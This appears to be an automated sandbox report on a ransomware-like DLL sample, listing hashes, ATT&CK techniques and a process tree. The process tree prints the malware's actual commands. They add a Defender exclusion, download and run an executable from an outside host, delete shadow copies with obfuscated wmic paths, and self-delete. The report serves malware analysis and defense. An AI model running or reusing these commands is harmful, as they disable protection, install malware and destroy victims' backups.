Analysis
-
max time kernel
94s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-12-2024 02:15
Static task
static1
Behavioral task
behavioral1
Sample
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll
Resource
win10v2004-20241007-en
General
-
Target
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll
-
Size
206KB
-
MD5
fccd129f6a5b9d2133d14922a3614f02
-
SHA1
e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
-
SHA256
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
-
SHA512
c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
-
SSDEEP
3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 2088 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3508 powershell.exe 2088 powershell.exe -
Downloads MZ/PE file
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt eryy65ty.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Decryptfiles.txt eryy65ty.exe -
Executes dropped EXE 1 IoCs
pid Process 4628 eryy65ty.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eryy65ty.exe" eryy65ty.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini eryy65ty.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eryy65ty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3172 cmd.exe 3680 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3680 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3508 powershell.exe 3508 powershell.exe 2088 powershell.exe 2088 powershell.exe 4628 eryy65ty.exe 4628 eryy65ty.exe 4628 eryy65ty.exe 4628 eryy65ty.exe 4628 eryy65ty.exe 4628 eryy65ty.exe 4628 eryy65ty.exe 4628 eryy65ty.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3508 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 4628 eryy65ty.exe Token: SeDebugPrivilege 4628 eryy65ty.exe Token: SeDebugPrivilege 4628 eryy65ty.exe Token: SeIncreaseQuotaPrivilege 384 wmic.exe Token: SeSecurityPrivilege 384 wmic.exe Token: SeTakeOwnershipPrivilege 384 wmic.exe Token: SeLoadDriverPrivilege 384 wmic.exe Token: SeSystemProfilePrivilege 384 wmic.exe Token: SeSystemtimePrivilege 384 wmic.exe Token: SeProfSingleProcessPrivilege 384 wmic.exe Token: SeIncBasePriorityPrivilege 384 wmic.exe Token: SeCreatePagefilePrivilege 384 wmic.exe Token: SeBackupPrivilege 384 wmic.exe Token: SeRestorePrivilege 384 wmic.exe Token: SeShutdownPrivilege 384 wmic.exe Token: SeDebugPrivilege 384 wmic.exe Token: SeSystemEnvironmentPrivilege 384 wmic.exe Token: SeRemoteShutdownPrivilege 384 wmic.exe Token: SeUndockPrivilege 384 wmic.exe Token: SeManageVolumePrivilege 384 wmic.exe Token: 33 384 wmic.exe Token: 34 384 wmic.exe Token: 35 384 wmic.exe Token: 36 384 wmic.exe Token: SeIncreaseQuotaPrivilege 384 wmic.exe Token: SeSecurityPrivilege 384 wmic.exe Token: SeTakeOwnershipPrivilege 384 wmic.exe Token: SeLoadDriverPrivilege 384 wmic.exe Token: SeSystemProfilePrivilege 384 wmic.exe Token: SeSystemtimePrivilege 384 wmic.exe Token: SeProfSingleProcessPrivilege 384 wmic.exe Token: SeIncBasePriorityPrivilege 384 wmic.exe Token: SeCreatePagefilePrivilege 384 wmic.exe Token: SeBackupPrivilege 384 wmic.exe Token: SeRestorePrivilege 384 wmic.exe Token: SeShutdownPrivilege 384 wmic.exe Token: SeDebugPrivilege 384 wmic.exe Token: SeSystemEnvironmentPrivilege 384 wmic.exe Token: SeRemoteShutdownPrivilege 384 wmic.exe Token: SeUndockPrivilege 384 wmic.exe Token: SeManageVolumePrivilege 384 wmic.exe Token: 33 384 wmic.exe Token: 34 384 wmic.exe Token: 35 384 wmic.exe Token: 36 384 wmic.exe Token: SeBackupPrivilege 4244 vssvc.exe Token: SeRestorePrivilege 4244 vssvc.exe Token: SeAuditPrivilege 4244 vssvc.exe Token: SeDebugPrivilege 4628 eryy65ty.exe Token: SeDebugPrivilege 4628 eryy65ty.exe Token: SeIncreaseQuotaPrivilege 3472 wmic.exe Token: SeSecurityPrivilege 3472 wmic.exe Token: SeTakeOwnershipPrivilege 3472 wmic.exe Token: SeLoadDriverPrivilege 3472 wmic.exe Token: SeSystemProfilePrivilege 3472 wmic.exe Token: SeSystemtimePrivilege 3472 wmic.exe Token: SeProfSingleProcessPrivilege 3472 wmic.exe Token: SeIncBasePriorityPrivilege 3472 wmic.exe Token: SeCreatePagefilePrivilege 3472 wmic.exe Token: SeBackupPrivilege 3472 wmic.exe Token: SeRestorePrivilege 3472 wmic.exe Token: SeShutdownPrivilege 3472 wmic.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2256 wrote to memory of 2992 2256 rundll32.exe 83 PID 2256 wrote to memory of 2992 2256 rundll32.exe 83 PID 2256 wrote to memory of 2992 2256 rundll32.exe 83 PID 2992 wrote to memory of 4276 2992 rundll32.exe 85 PID 2992 wrote to memory of 4276 2992 rundll32.exe 85 PID 2992 wrote to memory of 4276 2992 rundll32.exe 85 PID 4276 wrote to memory of 3508 4276 cmd.exe 87 PID 4276 wrote to memory of 3508 4276 cmd.exe 87 PID 4276 wrote to memory of 3508 4276 cmd.exe 87 PID 2992 wrote to memory of 4896 2992 rundll32.exe 92 PID 2992 wrote to memory of 4896 2992 rundll32.exe 92 PID 2992 wrote to memory of 4896 2992 rundll32.exe 92 PID 4896 wrote to memory of 2088 4896 cmd.exe 96 PID 4896 wrote to memory of 2088 4896 cmd.exe 96 PID 4896 wrote to memory of 2088 4896 cmd.exe 96 PID 2992 wrote to memory of 4440 2992 rundll32.exe 104 PID 2992 wrote to memory of 4440 2992 rundll32.exe 104 PID 2992 wrote to memory of 4440 2992 rundll32.exe 104 PID 4440 wrote to memory of 4628 4440 cmd.exe 107 PID 4440 wrote to memory of 4628 4440 cmd.exe 107 PID 4440 wrote to memory of 4628 4440 cmd.exe 107 PID 4628 wrote to memory of 384 4628 eryy65ty.exe 110 PID 4628 wrote to memory of 384 4628 eryy65ty.exe 110 PID 4628 wrote to memory of 3472 4628 eryy65ty.exe 118 PID 4628 wrote to memory of 3472 4628 eryy65ty.exe 118 PID 4628 wrote to memory of 3172 4628 eryy65ty.exe 119 PID 4628 wrote to memory of 3172 4628 eryy65ty.exe 119 PID 4628 wrote to memory of 3172 4628 eryy65ty.exe 119 PID 3172 wrote to memory of 3680 3172 cmd.exe 122 PID 3172 wrote to memory of 3680 3172 cmd.exe 122 PID 3172 wrote to memory of 3680 3172 cmd.exe 122 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll,#12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c %temp%/eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\eryy65ty.exeC:\Users\Admin\AppData\Local\Temp/eryy65ty.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628 -
\??\c:\Windows\system32\wbem\wmic.exec:\orCyeK\orCy\..\..\Windows\orCy\orCy\..\..\system32\orCy\orCy\..\..\wbem\orCy\orCye\..\..\wmic.exe shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\Jzfcwm\Jzfc\..\..\Windows\Jzfc\Jzfc\..\..\system32\Jzfc\Jzfc\..\..\wbem\Jzfc\Jzfcw\..\..\wmic.exe shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3680
-
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4244
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
16KB
MD5df8c2eaab985a4626b70e616393231ab
SHA1cecd5406b7228e7a4ad8f5ae5bb0b4d35660650e
SHA25691aa8dfd4fc80fbdfdbec4cf4c1c34a7c11ba9f7ec42128281e693b6fac0e57d
SHA5125107f0ffffe635f47e38fc69ed7735449dc17e62d8324976cb9cddcf55cdb280612c7bb9a301943e0c85dbcbc68eb48070473339d11bcd9aa64457b4ccd9e488
-
Filesize
4KB
MD5b61f3c2c0afa312305ae44c8d80e74ac
SHA171fcecee50feb64b8ff0c85f2f847becd3d4a92f
SHA2568fc06633bfc50b7b25b34a4b9b18656478a1d8cb255505b1a59b7e2f4873af4a
SHA5128da387384b15cb174083dfc1ac5632396f55491f46fe100e3c7e388610bfe57bd19c8bbef79a707d5e3a166815d612be63b68f6bb589183c932a021161cea57b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
881KB
MD59049faba5517305c44bd5f28398fb6b9
SHA1036c6b32f3e7d7d689c9b4d482091eebcc669bfa
SHA256d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3
SHA51265a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a